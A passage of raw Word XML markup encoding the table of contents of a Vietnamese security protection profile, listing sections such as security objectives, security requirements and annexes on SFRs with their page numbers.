        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30F204A8" w14:textId="44F79EE0" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476355" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4 Ký hiệu và chữ viết tắt</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476355 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FA95FAC" w14:textId="6894EF96" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476356" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5 Giới thiệu Hồ sơ bảo vệ</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476356 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FC81DA1" w14:textId="10B99A9A" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476357" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6 Các yêu cầu áp dụng</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476357 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B2582A8" w14:textId="24CE005E" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476358" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>7 Mô tả các vấn đề an toàn</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476358 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5912205A" w14:textId="3B233622" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476359" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>8 Các mục tiêu an toàn</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476359 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="276FF4D0" w14:textId="71C15703" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476360" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>9 Các yêu cầu an toàn</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476360 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D0F9A6B" w14:textId="6845B336" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476361" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>10 Đặc điểm về tính nhất quán</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476361 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AA3BFF5" w14:textId="55434B6C" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476362" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Phụ lục A Các SFR tùy chọn</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476362 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6707DF9C" w14:textId="6879A3CF" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476363" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Phụ lục B SFR cơ sở được lựa chọn</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476363 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="341A5A0F" w14:textId="39DB342F" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476364" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Phụ lục C SFR mục tiêu</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476364 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71FDCAFC" w14:textId="177BE973" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476365" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Phụ lục D Định nghĩa thành phần mở rộng</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476365 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A4B2491" w14:textId="3EEAC838" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476366" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Phụ lục E</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Toc137476367" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Các yêu cầu đáp ứng hoàn toàn</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476367 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FC682FA" w14:textId="32FA5045" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476368" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Thư mục tài liệu tham khảo</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476368 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:b w:val="0"/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
